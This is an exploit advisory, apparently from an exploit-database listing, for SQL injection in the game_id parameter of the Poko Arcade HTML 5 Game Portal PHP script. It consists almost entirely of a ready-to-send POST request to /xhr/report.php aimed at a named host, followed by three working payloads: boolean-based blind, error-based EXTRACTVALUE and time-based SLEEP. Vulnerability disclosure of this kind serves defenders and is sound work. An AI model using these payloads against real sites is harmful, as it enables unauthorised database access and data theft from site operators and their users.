# Exploit Title: Poko Arcade HTML 5 Game Portal PHP Script v1.0 - SQL Injection # Date: 05-03-2025 # Exploit Author: Buğra Enis Dönmez # Vendor: https://www.codester.com/items/48158/poko-arcade-html-5-game-portal-php-script # Tested on: Arch Linux # CVE: N/A # Special Thanks: Ahmet Ümit Bayram ### Request ### POST /xhr/report.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Accept: / x-requested-with: XMLHttpRequest Cookie: PHPSESSID=77ugk4bmujg32iur8vtthovpu2 Content-Length: 328 Accept-Encoding: gzip,deflate,br User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: poko.mvnstore.in Connection: Keep-alive game_id=1&game_name=Barbies%20Sketch&problem=e ### ### Parameter & Payloads ### Parameter: game_id (POST) Type: boolean-based blind Title: Boolean-based blind - Parameter replace (original value) Payload: game_id=(SELECT (CASE WHEN (5478=5478) THEN 1 ELSE (SELECT 5855 UNION SELECT 3253) END))&game_name=Barbies Sketch&problem=e Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: game_id=1 AND EXTRACTVALUE(6033,CONCAT(0x5c,0x7171627a71,(SELECT (ELT(6033=6033,1))),0x716a766b71))&game_name=Barbies Sketch&problem=e Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: game_id=1 AND (SELECT 8414 FROM (SELECT(SLEEP(5)))DwLw)&game_name=Barbies Sketch&problem=e ###